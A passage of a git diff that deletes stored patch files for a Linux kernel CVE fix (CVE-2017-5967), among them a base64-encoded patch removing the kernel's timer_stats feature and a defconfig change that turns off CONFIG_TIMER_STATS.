RlZmluZSBUU1RBVF9IQVNIX1NJWkUJCSgxVUwgPDwgVFNUQVRfSEFTSF9CSVRTKQotI2RlZmluZSBUU1RBVF9IQVNIX01BU0sJCShUU1RBVF9IQVNIX1NJWkUgLSAxKQotCi0jZGVmaW5lIF9fdHN0YXRfaGFzaGZuKGVudHJ5KQkJCQkJCVwKLQkoKCh1bnNpZ25lZCBsb25nKShlbnRyeSktPnRpbWVyICAgICAgIF4JCQkJXAotCSAgKHVuc2lnbmVkIGxvbmcpKGVudHJ5KS0+c3RhcnRfZnVuYyAgXgkJCQlcCi0JICAodW5zaWduZWQgbG9uZykoZW50cnkpLT5leHBpcmVfZnVuYyBeCQkJCVwKLQkgICh1bnNpZ25lZCBsb25nKShlbnRyeSktPnBpZAkJKSAmIFRTVEFUX0hBU0hfTUFTSykKLQotI2RlZmluZSB0c3RhdF9oYXNoZW50cnkoZW50cnkpCSh0c3RhdF9oYXNoX3RhYmxlICsgX190c3RhdF9oYXNoZm4oZW50cnkpKQotCi1zdGF0aWMgc3RydWN0IGVudHJ5ICp0c3RhdF9oYXNoX3RhYmxlW1RTVEFUX0hBU0hfU0laRV0gX19yZWFkX21vc3RseTsKLQotc3RhdGljIHZvaWQgcmVzZXRfZW50cmllcyh2b2lkKQotewotCW5yX2VudHJpZXMgPSAwOwotCW1lbXNldChlbnRyaWVzLCAwLCBzaXplb2YoZW50cmllcykpOwotCW1lbXNldCh0c3RhdF9oYXNoX3RhYmxlLCAwLCBzaXplb2YodHN0YXRfaGFzaF90YWJsZSkpOwotCWF0b21pY19zZXQoJm92ZXJmbG93X2NvdW50LCAwKTsKLX0KLQotc3RhdGljIHN0cnVjdCBlbnRyeSAqYWxsb2NfZW50cnkodm9pZCkKLXsKLQlpZiAobnJfZW50cmllcyA+PSBNQVhfRU5UUklFUykKLQkJcmV0dXJuIE5VTEw7Ci0KLQlyZXR1cm4gZW50cmllcyArIG5yX2VudHJpZXMrKzsKLX0KLQotc3RhdGljIGludCBtYXRjaF9lbnRyaWVzKHN0cnVjdCBlbnRyeSAqZW50cnkxLCBzdHJ1Y3QgZW50cnkgKmVudHJ5MikKLXsKLQlyZXR1cm4gZW50cnkxLT50aW1lciAgICAgICA9PSBlbnRyeTItPnRpbWVyCSAgJiYKLQkgICAgICAgZW50cnkxLT5zdGFydF9mdW5jICA9PSBlbnRyeTItPnN0YXJ0X2Z1bmMgICYmCi0JICAgICAgIGVudHJ5MS0+ZXhwaXJlX2Z1bmMgPT0gZW50cnkyLT5leHBpcmVfZnVuYyAmJgotCSAgICAgICBlbnRyeTEtPnBpZAkgICA9PSBlbnRyeTItPnBpZDsKLX0KLQotLyoKLSAqIExvb2sgdXAgd2hldGhlciBhbiBlbnRyeSBtYXRjaGluZyB0aGlzIGl0ZW0gaXMgcHJlc2VudAotICogaW4gdGhlIGhhc2ggYWxyZWFkeS4gTXVzdCBiZSBjYWxsZWQgd2l0aCBpcnFzIG9mZiBhbmQgdGhlCi0gKiBsb29rdXAgbG9jayBoZWxkOgotICovCi1zdGF0aWMgc3RydWN0IGVudHJ5ICp0c3RhdF9sb29rdXAoc3RydWN0IGVudHJ5ICplbnRyeSwgY2hhciAqY29tbSkKLXsKLQlzdHJ1Y3QgZW50cnkgKipoZWFkLCAqY3VyciwgKnByZXY7Ci0KLQloZWFkID0gdHN0YXRfaGFzaGVudHJ5KGVudHJ5KTsKLQljdXJyID0gKmhlYWQ7Ci0KLQkvKgotCSAqIFRoZSBmYXN0cGF0aCBpcyB3aGVuIHRoZSBlbnRyeSBpcyBhbHJlYWR5IGhhc2hlZCwKLQkgKiB3ZSBkbyB0aGlzIHdpdGggdGhlIGxvb2t1cCBsb2NrIGhlbGQsIGJ1dCB3aXRoIHRoZQotCSAqIHRhYmxlIGxvY2sgbm90IGhlbGQ6Ci0JICovCi0Jd2hpbGUgKGN1cnIpIHsKLQkJaWYgKG1hdGNoX2VudHJpZXMoY3VyciwgZW50cnkpKQotCQkJcmV0dXJuIGN1cnI7Ci0KLQkJY3VyciA9IGN1cnItPm5leHQ7Ci0JfQotCS8qCi0JICogU2xvd3BhdGg6IGFsbG9jYXRlLCBzZXQgdXAgYW5kIGxpbmsgYSBuZXcgaGFzaCBlbnRyeToKLQkgKi8KLQlwcmV2ID0gTlVMTDsKLQljdXJyID0gKmhlYWQ7Ci0KLQlyYXdfc3Bpbl9sb2NrKCZ0YWJsZV9sb2NrKTsKLQkvKgotCSAqIE1ha2Ugc3VyZSB3ZSBoYXZlIG5vdCByYWNlZCB3aXRoIGFub3RoZXIgQ1BVOgotCSAqLwotCXdoaWxlIChjdXJyKSB7Ci0JCWlmIChtYXRjaF9lbnRyaWVzKGN1cnIsIGVudHJ5KSkKLQkJCWdvdG8gb3V0X3VubG9jazsKLQotCQlwcmV2ID0gY3VycjsKLQkJY3VyciA9IGN1cnItPm5leHQ7Ci0JfQotCi0JY3VyciA9IGFsbG9jX2VudHJ5KCk7Ci0JaWYgKGN1cnIpIHsKLQkJKmN1cnIgPSAqZW50cnk7Ci0JCWN1cnItPmNvdW50ID0gMDsKLQkJY3Vyci0+bmV4dCA9IE5VTEw7Ci0JCW1lbWNweShjdXJyLT5jb21tLCBjb21tLCBUQVNLX0NPTU1fTEVOKTsKLQotCQlzbXBfbWIoKTsgLyogRW5zdXJlIHRoYXQgY3VyciBpcyBpbml0aWFsaXplZCBiZWZvcmUgaW5zZXJ0ICovCi0KLQkJaWYgKHByZXYpCi0JCQlwcmV2LT5uZXh0ID0gY3VycjsKLQkJZWxzZQotCQkJKmhlYWQgPSBjdXJyOwotCX0KLSBvdXRfdW5sb2NrOgotCXJhd19zcGluX3VubG9jaygmdGFibGVfbG9jayk7Ci0KLQlyZXR1cm4gY3VycjsKLX0KLQotLyoqCi0gKiB0aW1lcl9zdGF0c191cGRhdGVfc3RhdHMgLSBVcGRhdGUgdGhlIHN0YXRpc3RpY3MgZm9yIGEgdGltZXIuCi0gKiBAdGltZXI6CXBvaW50ZXIgdG8gZWl0aGVyIGEgdGltZXJfbGlzdCBvciBhIGhydGltZXIKLSAqIEBwaWQ6CXRoZSBwaWQgb2YgdGhlIHRhc2sgd2hpY2ggc2V0IHVwIHRoZSB0aW1lcgotICogQHN0YXJ0ZjoJcG9pbnRlciB0byB0aGUgZnVuY3Rpb24gd2hpY2ggZGlkIHRoZSB0aW1lciBzZXR1cAotICogQHRpbWVyZjoJcG9pbnRlciB0byB0aGUgdGltZXIgY2FsbGJhY2sgZnVuY3Rpb24gb2YgdGhlIHRpbWVyCi0gKiBAY29tbToJbmFtZSBvZiB0aGUgcHJvY2VzcyB3aGljaCBzZXQgdXAgdGhlIHRpbWVyCi0gKgotICogV2hlbiB0aGUgdGltZXIgaXMgYWxyZWFkeSByZWdpc3RlcmVkLCB0aGVuIHRoZSBldmVudCBjb3VudGVyIGlzCi0gKiBpbmNyZW1lbnRlZC4gT3RoZXJ3aXNlIHRoZSB0aW1lciBpcyByZWdpc3RlcmVkIGluIGEgZnJlZSBzbG90LgotICovCi12b2lkIHRpbWVyX3N0YXRzX3VwZGF0ZV9zdGF0cyh2b2lkICp0aW1lciwgcGlkX3QgcGlkLCB2b2lkICpzdGFydGYsCi0JCQkgICAgICB2b2lkICp0aW1lcmYsIGNoYXIgKmNvbW0sCi0JCQkgICAgICB1bnNpZ25lZCBpbnQgdGltZXJfZmxhZykKLXsKLQkvKgotCSAqIEl0IGRvZXNuJ3QgbWF0dGVyIHdoaWNoIGxvY2sgd2UgdGFrZToKLQkgKi8KLQlyYXdfc3BpbmxvY2tfdCAqbG9jazsKLQlzdHJ1Y3QgZW50cnkgKmVudHJ5LCBpbnB1dDsKLQl1bnNpZ25lZCBsb25nIGZsYWdzOwotCi0JaWYgKGxpa2VseSghdGltZXJfc3RhdHNfYWN0aXZlKSkKLQkJcmV0dXJuOwotCi0JbG9jayA9ICZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgcmF3X3NtcF9wcm9jZXNzb3JfaWQoKSk7Ci0KLQlpbnB1dC50aW1lciA9IHRpbWVyOwotCWlucHV0LnN0YXJ0X2Z1bmMgPSBzdGFydGY7Ci0JaW5wdXQuZXhwaXJlX2Z1bmMgPSB0aW1lcmY7Ci0JaW5wdXQucGlkID0gcGlkOwotCWlucHV0LnRpbWVyX2ZsYWcgPSB0aW1lcl9mbGFnOwotCi0JcmF3X3NwaW5fbG9ja19pcnFzYXZlKGxvY2ssIGZsYWdzKTsKLQlpZiAoIXRpbWVyX3N0YXRzX2FjdGl2ZSkKLQkJZ290byBvdXRfdW5sb2NrOwotCi0JZW50cnkgPSB0c3RhdF9sb29rdXAoJmlucHV0LCBjb21tKTsKLQlpZiAobGlrZWx5KGVudHJ5KSkKLQkJZW50cnktPmNvdW50Kys7Ci0JZWxzZQotCQlhdG9taWNfaW5jKCZvdmVyZmxvd19jb3VudCk7Ci0KLSBvdXRfdW5sb2NrOgotCXJhd19zcGluX3VubG9ja19pcnFyZXN0b3JlKGxvY2ssIGZsYWdzKTsKLX0KLQotc3RhdGljIHZvaWQgcHJpbnRfbmFtZV9vZmZzZXQoc3RydWN0IHNlcV9maWxlICptLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JY2hhciBzeW1uYW1lW0tTWU1fTkFNRV9MRU5dOwotCi0JaWYgKGxvb2t1cF9zeW1ib2xfbmFtZShhZGRyLCBzeW1uYW1lKSA8IDApCi0JCXNlcV9wcmludGYobSwgIjwlcD4iLCAodm9pZCAqKWFkZHIpOwotCWVsc2UKLQkJc2VxX3ByaW50ZihtLCAiJXMiLCBzeW1uYW1lKTsKLX0KLQotc3RhdGljIGludCB0c3RhdHNfc2hvdyhzdHJ1Y3Qgc2VxX2ZpbGUgKm0sIHZvaWQgKnYpCi17Ci0Jc3RydWN0IHRpbWVzcGVjIHBlcmlvZDsKLQlzdHJ1Y3QgZW50cnkgKmVudHJ5OwotCXVuc2lnbmVkIGxvbmcgbXM7Ci0JbG9uZyBldmVudHMgPSAwOwotCWt0aW1lX3QgdGltZTsKLQlpbnQgaTsKLQotCW11dGV4X2xvY2soJnNob3dfbXV0ZXgpOwotCS8qCi0JICogSWYgc3RpbGwgYWN0aXZlIHRoZW4gY2FsY3VsYXRlIHVwIHRvIG5vdzoKLQkgKi8KLQlpZiAodGltZXJfc3RhdHNfYWN0aXZlKQotCQl0aW1lX3N0b3AgPSBrdGltZV9nZXQoKTsKLQotCXRpbWUgPSBrdGltZV9zdWIodGltZV9zdG9wLCB0aW1lX3N0YXJ0KTsKLQotCXBlcmlvZCA9IGt0aW1lX3RvX3RpbWVzcGVjKHRpbWUpOwotCW1zID0gcGVyaW9kLnR2X25zZWMgLyAxMDAwMDAwOwotCi0Jc2VxX3B1dHMobSwgIlRpbWVyIFN0YXRzIFZlcnNpb246IHYwLjJcbiIpOwotCXNlcV9wcmludGYobSwgIlNhbXBsZSBwZXJpb2Q6ICVsZC4lMDNsZCBzXG4iLCBwZXJpb2QudHZfc2VjLCBtcyk7Ci0JaWYgKGF0b21pY19yZWFkKCZvdmVyZmxvd19jb3VudCkpCi0JCXNlcV9wcmludGYobSwgIk92ZXJmbG93OiAlZCBlbnRyaWVzXG4iLAotCQkJYXRvbWljX3JlYWQoJm92ZXJmbG93X2NvdW50KSk7Ci0KLQlmb3IgKGkgPSAwOyBpIDwgbnJfZW50cmllczsgaSsrKSB7Ci0JCWVudHJ5ID0gZW50cmllcyArIGk7Ci0gCQlpZiAoZW50cnktPnRpbWVyX2ZsYWcgJiBUSU1FUl9TVEFUU19GTEFHX0RFRkVSUkFCTEUpIHsKLQkJCXNlcV9wcmludGYobSwgIiU0bHVELCAlNWQgJS0xNnMgIiwKLQkJCQllbnRyeS0+Y291bnQsIGVudHJ5LT5waWQsIGVudHJ5LT5jb21tKTsKLQkJfSBlbHNlIHsKLQkJCXNlcV9wcmludGYobSwgIiAlNGx1LCAlNWQgJS0xNnMgIiwKLQkJCQllbnRyeS0+Y291bnQsIGVudHJ5LT5waWQsIGVudHJ5LT5jb21tKTsKLQkJfQotCi0JCXByaW50X25hbWVfb2Zmc2V0KG0sICh1bnNpZ25lZCBsb25nKWVudHJ5LT5zdGFydF9mdW5jKTsKLQkJc2VxX3B1dHMobSwgIiAoIik7Ci0JCXByaW50X25hbWVfb2Zmc2V0KG0sICh1bnNpZ25lZCBsb25nKWVudHJ5LT5leHBpcmVfZnVuYyk7Ci0JCXNlcV9wdXRzKG0sICIpXG4iKTsKLQotCQlldmVudHMgKz0gZW50cnktPmNvdW50OwotCX0KLQotCW1zICs9IHBlcmlvZC50dl9zZWMgKiAxMDAwOwotCWlmICghbXMpCi0JCW1zID0gMTsKLQotCWlmIChldmVudHMgJiYgcGVyaW9kLnR2X3NlYykKLQkJc2VxX3ByaW50ZihtLCAiJWxkIHRvdGFsIGV2ZW50cywgJWxkLiUwM2xkIGV2ZW50cy9zZWNcbiIsCi0JCQkgICBldmVudHMsIGV2ZW50cyAqIDEwMDAgLyBtcywKLQkJCSAgIChldmVudHMgKiAxMDAwMDAwIC8gbXMpICUgMTAwMCk7Ci0JZWxzZQotCQlzZXFfcHJpbnRmKG0sICIlbGQgdG90YWwgZXZlbnRzXG4iLCBldmVudHMpOwotCi0JbXV0ZXhfdW5sb2NrKCZzaG93X211dGV4KTsKLQotCXJldHVybiAwOwotfQotCi0vKgotICogQWZ0ZXIgYSBzdGF0ZSBjaGFuZ2UsIG1ha2Ugc3VyZSBhbGwgY29uY3VycmVudCBsb29rdXAvdXBkYXRlCi0gKiBhY3Rpdml0aWVzIGhhdmUgc3RvcHBlZDoKLSAqLwotc3RhdGljIHZvaWQgc3luY19hY2Nlc3Modm9pZCkKLXsKLQl1bnNpZ25lZCBsb25nIGZsYWdzOwotCWludCBjcHU7Ci0KLQlmb3JfZWFjaF9vbmxpbmVfY3B1KGNwdSkgewotCQlyYXdfc3BpbmxvY2tfdCAqbG9jayA9ICZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgY3B1KTsKLQotCQlyYXdfc3Bpbl9sb2NrX2lycXNhdmUobG9jaywgZmxhZ3MpOwotCQkvKiBub3RoaW5nICovCi0JCXJhd19zcGluX3VubG9ja19pcnFyZXN0b3JlKGxvY2ssIGZsYWdzKTsKLQl9Ci19Ci0KLXN0YXRpYyBzc2l6ZV90IHRzdGF0c193cml0ZShzdHJ1Y3QgZmlsZSAqZmlsZSwgY29uc3QgY2hhciBfX3VzZXIgKmJ1ZiwKLQkJCSAgICBzaXplX3QgY291bnQsIGxvZmZfdCAqb2ZmcykKLXsKLQljaGFyIGN0bFsyXTsKLQotCWlmIChjb3VudCAhPSAyIHx8ICpvZmZzKQotCQlyZXR1cm4gLUVJTlZBTDsKLQotCWlmIChjb3B5X2Zyb21fdXNlcihjdGwsIGJ1ZiwgY291bnQpKQotCQlyZXR1cm4gLUVGQVVMVDsKLQotCW11dGV4X2xvY2soJnNob3dfbXV0ZXgpOwotCXN3aXRjaCAoY3RsWzBdKSB7Ci0JY2FzZSAnMCc6Ci0JCWlmICh0aW1lcl9zdGF0c19hY3RpdmUpIHsKLQkJCXRpbWVyX3N0YXRzX2FjdGl2ZSA9IDA7Ci0JCQl0aW1lX3N0b3AgPSBrdGltZV9nZXQoKTsKLQkJCXN5bmNfYWNjZXNzKCk7Ci0JCX0KLQkJYnJlYWs7Ci0JY2FzZSAnMSc6Ci0JCWlmICghdGltZXJfc3RhdHNfYWN0aXZlKSB7Ci0JCQlyZXNldF9lbnRyaWVzKCk7Ci0JCQl0aW1lX3N0YXJ0ID0ga3RpbWVfZ2V0KCk7Ci0JCQlzbXBfbWIoKTsKLQkJCXRpbWVyX3N0YXRzX2FjdGl2ZSA9IDE7Ci0JCX0KLQkJYnJlYWs7Ci0JZGVmYXVsdDoKLQkJY291bnQgPSAtRUlOVkFMOwotCX0KLQltdXRleF91bmxvY2soJnNob3dfbXV0ZXgpOwotCi0JcmV0dXJuIGNvdW50OwotfQotCi1zdGF0aWMgaW50IHRzdGF0c19vcGVuKHN0cnVjdCBpbm9kZSAqaW5vZGUsIHN0cnVjdCBmaWxlICpmaWxwKQotewotCXJldHVybiBzaW5nbGVfb3BlbihmaWxwLCB0c3RhdHNfc2hvdywgTlVMTCk7Ci19Ci0KLXN0YXRpYyBjb25zdCBzdHJ1Y3QgZmlsZV9vcGVyYXRpb25zIHRzdGF0c19mb3BzID0gewotCS5vcGVuCQk9IHRzdGF0c19vcGVuLAotCS5yZWFkCQk9IHNlcV9yZWFkLAotCS53cml0ZQkJPSB0c3RhdHNfd3JpdGUsCi0JLmxsc2VlawkJPSBzZXFfbHNlZWssCi0JLnJlbGVhc2UJPSBzaW5nbGVfcmVsZWFzZSwKLX07Ci0KLXZvaWQgX19pbml0IGluaXRfdGltZXJfc3RhdHModm9pZCkKLXsKLQlpbnQgY3B1OwotCi0JZm9yX2VhY2hfcG9zc2libGVfY3B1KGNwdSkKLQkJcmF3X3NwaW5fbG9ja19pbml0KCZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgY3B1KSk7Ci19Ci0KLXN0YXRpYyBpbnQgX19pbml0IGluaXRfdHN0YXRzX3Byb2Nmcyh2b2lkKQotewotCXN0cnVjdCBwcm9jX2Rpcl9lbnRyeSAqcGU7Ci0KLQlwZSA9IHByb2NfY3JlYXRlKCJ0aW1lcl9zdGF0cyIsIDA2NDQsIE5VTEwsICZ0c3RhdHNfZm9wcyk7Ci0JaWYgKCFwZSkKLQkJcmV0dXJuIC1FTk9NRU07Ci0JcmV0dXJuIDA7Ci19Ci1fX2luaXRjYWxsKGluaXRfdHN0YXRzX3Byb2Nmcyk7CmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZXIuYyBiL2tlcm5lbC90aW1lci5jCmluZGV4IDU3MzMwNzYuLjhiZmYwYTkgMTAwNjQ0Ci0tLSBhL2tlcm5lbC90aW1lci5jCisrKyBiL2tlcm5lbC90aW1lci5jCkBAIC0zOTcsMzQgKzM5Nyw2IEBACiAJfQogfQogCi0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi12b2lkIF9fdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8oc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyLCB2b2lkICphZGRyKQotewotCWlmICh0aW1lci0+c3RhcnRfc2l0ZSkKLQkJcmV0dXJuOwotCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBhZGRyOwotCW1lbWNweSh0aW1lci0+c3RhcnRfY29tbSwgY3VycmVudC0+Y29tbSwgVEFTS19DT01NX0xFTik7Ci0JdGltZXItPnN0YXJ0X3BpZCA9IGN1cnJlbnQtPnBpZDsKLX0KLQotc3RhdGljIHZvaWQgdGltZXJfc3RhdHNfYWNjb3VudF90aW1lcihzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci0JdW5zaWduZWQgaW50IGZsYWcgPSAwOwotCi0JaWYgKGxpa2VseSghdGltZXItPnN0YXJ0X3NpdGUpKQotCQlyZXR1cm47Ci0JaWYgKHVubGlrZWx5KHRiYXNlX2dldF9kZWZlcnJhYmxlKHRpbWVyLT5iYXNlKSkpCi0JCWZsYWcgfD0gVElNRVJfU1RBVFNfRkxBR19ERUZFUlJBQkxFOwotCi0JdGltZXJfc3RhdHNfdXBkYXRlX3N0YXRzKHRpbWVyLCB0aW1lci0+c3RhcnRfcGlkLCB0aW1lci0+c3RhcnRfc2l0ZSwKLQkJCQkgdGltZXItPmZ1bmN0aW9uLCB0aW1lci0+c3RhcnRfY29tbSwgZmxhZyk7Ci19Ci0KLSNlbHNlCi1zdGF0aWMgdm9pZCB0aW1lcl9zdGF0c19hY2NvdW50X3RpbWVyKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lcikge30KLSNlbmRpZgotCiAjaWZkZWYgQ09ORklHX0RFQlVHX09CSkVDVFNfVElNRVJTCiAKIHN0YXRpYyBzdHJ1Y3QgZGVidWdfb2JqX2Rlc2NyIHRpbWVyX2RlYnVnX2Rlc2NyOwpAQCAtNjM3LDExICs2MDksNiBAQAogCXRpbWVyLT5lbnRyeS5uZXh0ID0gTlVMTDsKIAl0aW1lci0+YmFzZSA9ICh2b2lkICopKCh1bnNpZ25lZCBsb25nKWJhc2UgfCBmbGFncyk7CiAJdGltZXItPnNsYWNrID0gLTE7Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotCXRpbWVyLT5zdGFydF9waWQgPSAtMTsKLQltZW1zZXQodGltZXItPnN0YXJ0X2NvbW0sIDAsIFRBU0tfQ09NTV9MRU4pOwotI2VuZGlmCiAJbG9ja2RlcF9pbml0X21hcCgmdGltZXItPmxvY2tkZXBfbWFwLCBuYW1lLCBrZXksIDApOwogfQogCkBAIC03MzksNyArNzA2LDYgQEAKIAl1bnNpZ25lZCBsb25nIGZsYWdzOwogCWludCByZXQgPSAwICwgY3B1OwogCi0JdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8odGltZXIpOwogCUJVR19PTighdGltZXItPmZ1bmN0aW9uKTsKIAogCWJhc2UgPSBsb2NrX3RpbWVyX2Jhc2UodGltZXIsICZmbGFncyk7CkBAIC05NDMsNyArOTA5LDYgQEAKIAlzdHJ1Y3QgdHZlY19iYXNlICpiYXNlID0gcGVyX2NwdSh0dmVjX2Jhc2VzLCBjcHUpOwogCXVuc2lnbmVkIGxvbmcgZmxhZ3M7CiAKLQl0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbyh0aW1lcik7CiAJQlVHX09OKHRpbWVyX3BlbmRpbmcodGltZXIpIHx8ICF0aW1lci0+ZnVuY3Rpb24pOwogCXNwaW5fbG9ja19pcnFzYXZlKCZiYXNlLT5sb2NrLCBmbGFncyk7CiAJdGltZXJfc2V0X2Jhc2UodGltZXIsIGJhc2UpOwpAQCAtOTgxLDcgKzk0Niw2IEBACiAKIAlkZWJ1Z19hc3NlcnRfaW5pdCh0aW1lcik7CiAKLQl0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHRpbWVyKTsKIAlpZiAodGltZXJfcGVuZGluZyh0aW1lcikpIHsKIAkJYmFzZSA9IGxvY2tfdGltZXJfYmFzZSh0aW1lciwgJmZsYWdzKTsKIAkJcmV0ID0gZGV0YWNoX2lmX3BlbmRpbmcodGltZXIsIGJhc2UsIHRydWUpOwpAQCAtMTAwOSwxMCArOTczLDkgQEAKIAogCWJhc2UgPSBsb2NrX3RpbWVyX2Jhc2UodGltZXIsICZmbGFncyk7CiAKLQlpZiAoYmFzZS0+cnVubmluZ190aW1lciAhPSB0aW1lcikgewotCQl0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHRpbWVyKTsKKwlpZiAoYmFzZS0+cnVubmluZ190aW1lciAhPSB0aW1lcikKIAkJcmV0ID0gZGV0YWNoX2lmX3BlbmRpbmcodGltZXIsIGJhc2UsIHRydWUpOwotCX0KKwogCXNwaW5fdW5sb2NrX2lycXJlc3RvcmUoJmJhc2UtPmxvY2ssIGZsYWdzKTsKIAogCXJldHVybiByZXQ7CkBAIC0xMTkyLDggKzExNTUsNiBAQAogCQkJZm4gPSB0aW1lci0+ZnVuY3Rpb247CiAJCQlkYXRhID0gdGltZXItPmRhdGE7CiAJCQlpcnFzYWZlID0gdGJhc2VfZ2V0X2lycXNhZmUodGltZXItPmJhc2UpOwotCi0JCQl0aW1lcl9zdGF0c19hY2NvdW50X3RpbWVyKHRpbWVyKTsKIAogCQkJYmFzZS0+cnVubmluZ190aW1lciA9IHRpbWVyOwogCQkJZGV0YWNoX2V4cGlyZWRfdGltZXIodGltZXIsIGJhc2UpOwpAQCAtMTY5NSw3ICsxNjU2LDYgQEAKIAogCWVyciA9IHRpbWVyX2NwdV9ub3RpZnkoJnRpbWVyc19uYiwgKHVuc2lnbmVkIGxvbmcpQ1BVX1VQX1BSRVBBUkUsCiAJCQkgICAgICAgKHZvaWQgKikobG9uZylzbXBfcHJvY2Vzc29yX2lkKCkpOwotCWluaXRfdGltZXJfc3RhdHMoKTsKIAogCUJVR19PTihlcnIgIT0gTk9USUZZX09LKTsKIApkaWZmIC0tZ2l0IGEva2VybmVsL3dvcmtxdWV1ZS5jIGIva2VybmVsL3dvcmtxdWV1ZS5jCmluZGV4IDI1MDU2NDguLjU2MmYxYTUgMTAwNzU1Ci0tLSBhL2tlcm5lbC93b3JrcXVldWUuYworKysgYi9rZXJuZWwvd29ya3F1ZXVlLmMKQEAgLTE0NDgsOCArMTQ0OCw2IEBACiAJCXJldHVybjsKIAl9CiAKLQl0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbygmZHdvcmstPnRpbWVyKTsKLQogCWR3b3JrLT53cSA9IHdxOwogCWR3b3JrLT5jcHUgPSBjcHU7CiAJdGltZXItPmV4cGlyZXMgPSBqaWZmaWVzICsgZGVsYXk7CmRpZmYgLS1naXQgYS9saWIvS2NvbmZpZy5kZWJ1ZyBiL2xpYi9LY29uZmlnLmRlYnVnCmluZGV4IGEwODE4ZjEuLjgyMmUyYmUgMTAwNzU1Ci0tLSBhL2xpYi9LY29uZmlnLmRlYnVnCisrKyBiL2xpYi9LY29uZmlnLmRlYnVnCkBAIC00MDAsMjAgKzQwMCw2IEBACiAJICBhcHBsaWNhdGlvbiwgeW91IGNhbiBzYXkgTiB0byBhdm9pZCB0aGUgdmVyeSBzbGlnaHQgb3ZlcmhlYWQKIAkgIHRoaXMgYWRkcy4KIAotY29uZmlnIFRJTUVSX1NUQVRTCi0JYm9vbCAiQ29sbGVjdCBrZXJuZWwgdGltZXJzIHN0YXRpc3RpY3MiCi0JZGVwZW5kcyBvbiBERUJVR19LRVJORUwgJiYgUFJPQ19GUwotCWhlbHAKLQkgIElmIHlvdSBzYXkgWSBoZXJlLCBhZGRpdGlvbmFsIGNvZGUgd2lsbCBiZSBpbnNlcnRlZCBpbnRvIHRoZQotCSAgdGltZXIgcm91dGluZXMgdG8gY29sbGVjdCBzdGF0aXN0aWNzIGFib3V0IGtlcm5lbCB0aW1lcnMgYmVpbmcKLQkgIHJlcHJvZ3JhbW1lZC4gVGhlIHN0YXRpc3RpY3MgY2FuIGJlIHJlYWQgZnJvbSAvcHJvYy90aW1lcl9zdGF0cy4KLQkgIFRoZSBzdGF0aXN0aWNzIGNvbGxlY3Rpb24gaXMgc3RhcnRlZCBieSB3cml0aW5nIDEgdG8gL3Byb2MvdGltZXJfc3RhdHMsCi0JICB3cml0aW5nIDAgc3RvcHMgaXQuIFRoaXMgZmVhdHVyZSBpcyB1c2VmdWwgdG8gY29sbGVjdCBpbmZvcm1hdGlvbgotCSAgYWJvdXQgdGltZXIgdXNhZ2UgcGF0dGVybnMgaW4ga2VybmVsIGFuZCB1c2Vyc3BhY2UuIFRoaXMgZmVhdHVyZQotCSAgaXMgbGlnaHR3ZWlnaHQgaWYgZW5hYmxlZCBpbiB0aGUga2VybmVsIGNvbmZpZyBidXQgbm90IGFjdGl2YXRlZAotCSAgKGl0IGRlZmF1bHRzIHRvIGRlYWN0aXZhdGVkIG9uIGJvb3R1cCBhbmQgd2lsbCBvbmx5IGJlIGFjdGl2YXRlZAotCSAgaWYgc29tZSBhcHBsaWNhdGlvbiBsaWtlIHBvd2VydG9wIGFjdGl2YXRlcyBpdCBleHBsaWNpdGx5KS4KLQogY29uZmlnIERFQlVHX09CSkVDVFMKIAlib29sICJEZWJ1ZyBvYmplY3Qgb3BlcmF0aW9ucyIKIAlkZXBlbmRzIG9uIERFQlVHX0tFUk5FTAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch
deleted file mode 100644
index 90b2f55c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-From 63d41fb2b101ff0bd786deab3c60114d38d47048 Mon Sep 17 00:00:00 2001
-From: Christopher R. Palmer <crpalmer@gmail.com>
-Date: Sat, 29 Apr 2017 06:44:14 -0400
-Subject: [PATCH] pme: defconfig: Remove CONFIG_TIMER_STATS
-
-Change-Id: Ib4c88393eccc70e998f3a7dcc9f9a4de5230735c
----
-
-diff --git a/arch/arm64/configs/pme_defconfig b/arch/arm64/configs/pme_defconfig
-index b145bb6..6ad8818 100644
---- a/arch/arm64/configs/pme_defconfig
-+++ b/arch/arm64/configs/pme_defconfig
-@@ -4414,7 +4414,6 @@
- # CONFIG_PANIC_ON_RT_THROTTLING is not set
- # CONFIG_SCHEDSTATS is not set
- # CONFIG_SCHED_STACK_END_CHECK is not set
--CONFIG_TIMER_STATS=y
- # CONFIG_DEBUG_MODULE_SCAN_OFF is not set
- # CONFIG_DEBUG_TASK_STACK_SCAN_OFF is not set
- # CONFIG_DEBUG_PREEMPT is not set
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64
deleted file mode 100644
index 577a36e4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
